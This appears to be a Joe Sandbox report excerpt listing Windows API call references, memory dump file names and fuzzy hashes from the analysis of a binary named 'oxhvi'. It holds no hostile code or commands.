                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0059EC9F
                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0059ECD8
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059EE17
                                                                                                                                                      • _wcslen.LIBCMT ref: 0059EE2F
                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0059EE7C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3183298772-0
                                                                                                                                                      • Opcode ID: 5ad1301e0c45401fce226b455dbc0e0cb1c661438832e828380f7b1cfc3e1eff
                                                                                                                                                      • Instruction ID: 8c83fa0830a5042484a3f78183f1ed4b66c9e9b2c122cf3a78691a158281642f
                                                                                                                                                      • Opcode Fuzzy Hash: 5ad1301e0c45401fce226b455dbc0e0cb1c661438832e828380f7b1cfc3e1eff
                                                                                                                                                      • Instruction Fuzzy Hash: 8B5156B24083469BDB64DB54D8959DBBBECBFC4310F00092EF689D3151EF74E6888756
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                      • Opcode ID: c2c19803574cce5037f9770aab2ba4857e958193a7921210233b4cd89ee42a78
                                                                                                                                                      • Instruction ID: 2100fe098e378247506779ede08e9a1090849647bad285db3f5fcc63757b07a0
                                                                                                                                                      • Opcode Fuzzy Hash: c2c19803574cce5037f9770aab2ba4857e958193a7921210233b4cd89ee42a78
                                                                                                                                                      • Instruction Fuzzy Hash: 6941C132A006149FDB20DF78C885A59BBF6FF88314F1585A9E915EB391EA31ED01CB81
                                                                                                                                                      APIs
                                                                                                                                                      • GetInputState.USER32 ref: 005A4225
                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 005A427C
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 005A42A5
                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 005A42AF
                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005A42C0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                      • Opcode ID: da139b829660ca191ca2723423063a6db48b5ea1c95b1f78ace4d27b204de465
                                                                                                                                                      • Instruction ID: b3861a6f01a97b7977b9c1c9456014e96f8a2f2430dd5cba0e9ceb92935667f9
                                                                                                                                                      • Opcode Fuzzy Hash: da139b829660ca191ca2723423063a6db48b5ea1c95b1f78ace4d27b204de465
                                                                                                                                                      • Instruction Fuzzy Hash: D73186745442429EEF25C7A4984DBBB3FA8BF52304F04496EE462C21A0E7F49889DF21
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005921A5
                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00592251
                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00592259
                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 0059226A
                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00592272
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                      • Opcode ID: 3b2f07e4b099fa15f48a43a787c25f058e86daf2f06deda5a329d45ba2e3da6a
                                                                                                                                                      • Instruction ID: 88a7f033ef2b18fd68bf14fec3335694f4e9c4aa384d9e5ca17c5ac13e1ea48c
                                                                                                                                                      • Opcode Fuzzy Hash: 3b2f07e4b099fa15f48a43a787c25f058e86daf2f06deda5a329d45ba2e3da6a
                                                                                                                                                      • Instruction Fuzzy Hash: 1D319C75900219EFDF04CFA8DD89A9E3BB5FB14315F104229FA25EB2D0C770A954DBA0
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005C60A4
                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 005C60FC
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C610E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C6119
                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 005C6175
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 763830540-0
                                                                                                                                                      • Opcode ID: b0ac9b6af034564c01170ba0a355a97c34d64097a8cef4098291e5475f31ef88
                                                                                                                                                      • Instruction ID: 8d1f1c27cea6cd22b01953f7da6d0deee49ffd21370111e256eb0e0dd5d2f061
                                                                                                                                                      • Opcode Fuzzy Hash: b0ac9b6af034564c01170ba0a355a97c34d64097a8cef4098291e5475f31ef88
                                                                                                                                                      • Instruction Fuzzy Hash: 89215075900219AFDB109FE4CC88EEEBFB8FB45724F14461AF925EA181D7709A85CF50
                                                                                                                                                      APIs
                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?,?,00590BEE), ref: 005908BB
                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?), ref: 005908D6
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?), ref: 005908E4
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?), ref: 005908F4
                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005907D1,80070057,?,?), ref: 00590900
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                      • Opcode ID: 062d3201c3eb12ce70a2ffec732ea4dbf2a70d9100c74b8ca900f8666f1a1f22
                                                                                                                                                      • Instruction ID: f8240efe8c86d7507017a15270b7c9b39eb2843068bed3d6dcc3f1e5d45a8cd2
                                                                                                                                                      • Opcode Fuzzy Hash: 062d3201c3eb12ce70a2ffec732ea4dbf2a70d9100c74b8ca900f8666f1a1f22
                                                                                                                                                      • Instruction Fuzzy Hash: B5017C72600608AFDB104F64DC04FAA7EBDFB88751F105824F905D2251D770DD00ABA0
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0BE0
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0BED
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0BFA
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0C07
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0C14
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005A0A39,?,005A3C56,?,00000001,00573ACE,?), ref: 005A0C21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 676ee351017d50cfbd3f257083e48f305c662cadc4b596c7be61913a7bdb3f4e
                                                                                                                                                      • Instruction ID: ccc0c84bccc64280e4e4415070509381672601cad025f764e11a7b3380043ea6
                                                                                                                                                      • Opcode Fuzzy Hash: 676ee351017d50cfbd3f257083e48f305c662cadc4b596c7be61913a7bdb3f4e
                                                                                                                                                      • Instruction Fuzzy Hash: BF01EE71800B16CFCB30AF66D98080AFBF9FF603193009A3ED09242971C7B1A889CF90
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 005964E7
                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 005964FE
                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00596516
                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00596532
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0059654C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                      • Opcode ID: 3e910fbc603ad959526a5b14a101a90065342f0d50d168809ca3773cea63c55d
                                                                                                                                                      • Instruction ID: 472ab51b31d6f5051cef7a3e7a57e8b5f6ee62fb5ad6023991fb1110ec2637d6
                                                                                                                                                      • Opcode Fuzzy Hash: 3e910fbc603ad959526a5b14a101a90065342f0d50d168809ca3773cea63c55d
                                                                                                                                                      • Instruction Fuzzy Hash: 2D018630500B04ABEF255B10DE4EF967BB8FB20705F410569B587A14E1DBF4AA9CDB60
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 0056264E
                                                                                                                                                        • Part of subcall function 00562D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4), ref: 00562D6E
                                                                                                                                                        • Part of subcall function 00562D58: GetLastError.KERNEL32(00601DC4,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4,00601DC4), ref: 00562D80
                                                                                                                                                      • _free.LIBCMT ref: 00562660
                                                                                                                                                      • _free.LIBCMT ref: 00562673
                                                                                                                                                      • _free.LIBCMT ref: 00562684
                                                                                                                                                      • _free.LIBCMT ref: 00562695
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: e52b8c4148f719c4e32b456719e155032b01f1ab7fce74edb3958a36bd76e80e
                                                                                                                                                      • Instruction ID: fd1bd5c3254587a09bcd09bec803305519aac9da491ddc5d79b0068ae9bca5d1
                                                                                                                                                      • Opcode Fuzzy Hash: e52b8c4148f719c4e32b456719e155032b01f1ab7fce74edb3958a36bd76e80e
                                                                                                                                                      • Instruction Fuzzy Hash: D4F03A708919228BCB01AFA4EC0985A3FF6BF25791701120FF414E7275DB740A43BFA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 005505D2: EnterCriticalSection.KERNEL32(0060170C,?,00000000,?,0053D1DA,00603540,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?), ref: 005505DD
                                                                                                                                                        • Part of subcall function 005505D2: LeaveCriticalSection.KERNEL32(0060170C,?,0053D1DA,00603540,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?,00000001,00602430), ref: 0055061A
                                                                                                                                                        • Part of subcall function 00550433: __onexit.LIBCMT ref: 00550439
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 005B6B95
                                                                                                                                                        • Part of subcall function 00550588: EnterCriticalSection.KERNEL32(0060170C,00000000,?,0053D208,00603540,005727E9,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?), ref: 00550592
                                                                                                                                                        • Part of subcall function 00550588: LeaveCriticalSection.KERNEL32(0060170C,?,0053D208,00603540,005727E9,00000001,00000000,?,?,005AEF39,?,?,00000000,00000001,?,00000001), ref: 005505C5
                                                                                                                                                        • Part of subcall function 005A3EF6: LoadStringW.USER32(00000066,?,00000FFF,005CDCEC), ref: 005A3F3E
                                                                                                                                                        • Part of subcall function 005A3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 005A3F64
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                                                      • String ID: x3`$x3`$x3`
                                                                                                                                                      • API String ID: 1072379062-2244824962
                                                                                                                                                      • Opcode ID: ec44859d7d5c1848d72c4ce3ee9f38509066765ef6b8130775143e825c5d3a9b
                                                                                                                                                      • Instruction ID: b9fd30f81734e98388483f1173162783f58442ebd855ff815697d2bb17d649cc
                                                                                                                                                      • Opcode Fuzzy Hash: ec44859d7d5c1848d72c4ce3ee9f38509066765ef6b8130775143e825c5d3a9b
                                                                                                                                                      • Instruction Fuzzy Hash: B5C16A75A0010AAFDB24DF58C895EFABBB9FF48300F148429F905AB291DB74ED45CB90
                                                                                                                                                      APIs
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005CDCD0,00000000,?,?,?,?), ref: 005C4E09
                                                                                                                                                      • GetWindowLongW.USER32 ref: 005C4E26
                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005C4E36
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                      • Opcode ID: c810c409c732af125a146db20b25ba2fd0e81aefe85d3fdcc10be70650dcbe23
                                                                                                                                                      • Instruction ID: 64d35d1cbce12a90e45159107d9de49e1306cb70f956cfecda7618f05447de32
                                                                                                                                                      • Opcode Fuzzy Hash: c810c409c732af125a146db20b25ba2fd0e81aefe85d3fdcc10be70650dcbe23
                                                                                                                                                      • Instruction Fuzzy Hash: 8B315E3110060AAFDF219EB8CC55FEA7BA9FB58334F254729F975D21D0D770A8509B50
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005C489F
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005C48B3
                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 005C48D7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                      • Opcode ID: 7cd0dc37ae08302471452afc5ebc90745ed5297585f000ca889bed73d659958b
                                                                                                                                                      • Instruction ID: 45f5f7fc2af52be0236fb5d7e42211e749cffcb1150bd85f0861dd43126bdb7b
                                                                                                                                                      • Opcode Fuzzy Hash: 7cd0dc37ae08302471452afc5ebc90745ed5297585f000ca889bed73d659958b
                                                                                                                                                      • Instruction Fuzzy Hash: 58219132500219AFDF158F90CC46FEA3F79FF88724F150118FA15AB1D0D6B5A8559BA0
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005C419F
                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005C41AF
                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005C41D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                      • String ID: Listbox
                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                      • Opcode ID: 72b70d4af00f22b7d4f62d4653e2d3f043372c785ffd5969f23d6c041a867718
                                                                                                                                                      • Instruction ID: 306f0b91ec41a8ff71bfd3445f765f552382bf0db14db66af376c9d3721cba39
                                                                                                                                                      • Opcode Fuzzy Hash: 72b70d4af00f22b7d4f62d4653e2d3f043372c785ffd5969f23d6c041a867718
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21A132610118BFDF218F94DC44FBB3BAEFB99750F048118FA449B190C6719C92CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005C4BAE
                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005C4BC3
                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005C4BD0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                      • Opcode ID: 3f18123be87a9d3b1714507d2e5a63a9ba32caf59946943b75a1f25a5eaf40e9
                                                                                                                                                      • Instruction ID: d5141343ec3751ee223e4678771b644d6061fc8e255b9ed5fdbec979be503a3d
                                                                                                                                                      • Opcode Fuzzy Hash: 3f18123be87a9d3b1714507d2e5a63a9ba32caf59946943b75a1f25a5eaf40e9
                                                                                                                                                      • Instruction Fuzzy Hash: F111E331240208BEEF215FA4CC06FAB7BACFF85B28F114518FA55E60A0D671DC219B20
